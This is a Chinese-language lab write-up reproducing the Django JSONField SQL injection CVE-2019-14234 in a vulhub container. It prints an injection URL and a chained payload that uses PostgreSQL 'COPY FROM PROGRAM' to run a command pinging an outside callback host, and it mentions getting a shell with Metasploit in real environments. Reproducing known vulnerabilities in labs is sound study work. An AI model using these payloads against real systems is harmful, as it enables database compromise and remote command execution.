vulhub漏洞复现-Django JSONField SQL注入漏洞复现 (CVE-2019-14234)

Django JSONField SQL注入漏洞复现 (CVE-2019-14234)

漏洞概述:
Django通常搭配postgresql数据库,而JSONField是该数据库的一种数据类型。该漏洞的出现的原因在于Django中JSONField类的实现,Django的model最本质的作用是生成SQL语句,而在Django通过JSONField生成sql语句时,是通过简单的字符串拼接。

通过JSONField类获得KeyTransform类并生成sql语句的位置。
其中key_name是可控的字符串,最终生成的语句是WHERE (field->’[key_name]’) = ‘value’,因此可以进行SQL注入。

漏洞版本:
Django
1.11.x before 1.11.23
2.1.x before 2.1.11
2.2.x before 2.2.4

漏洞复现:
Docker搭建靶场。搭建后访问192.168.118:8000,靶场搭建成功
vulhub漏洞复现-Django JSONField SQL注入漏洞复现 (CVE-2019-14234)

访问192.168.118.147:8000/admin/,输入账号密码admin a123123123
vulhub漏洞复现-Django JSONField SQL注入漏洞复现 (CVE-2019-14234)

构造URL进行查询,可以看到已经注入成功,并且可以看到构造的SQL语句

http://ip:8000/admin/vuln/collection/?detail__a%27b=123

vulhub漏洞复现-Django JSONField SQL注入漏洞复现 (CVE-2019-14234)

结合CVE-2019-9193 PostgreSQL高权限命令执行漏洞(https://blog.csdn.net/blood_pupil/article/details/88795627)构造url进行命令注入,这里主要就是利用PostgreSQL的高权限执行cmd_exec,
使用ceye平台检测是否执行了命令

http://ip:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 %3bcopy cmd_exec FROM PROGRAM 'ping ceye的地址'--%20

检测到流量
vulhub漏洞复现-Django JSONField SQL注入漏洞复现 (CVE-2019-14234)

真实环境中可以结合msf通过CVE-2019-9193来getshell

上一篇:工具篇-Java中一些utils


下一篇:Mybatis | 反射工具类大集合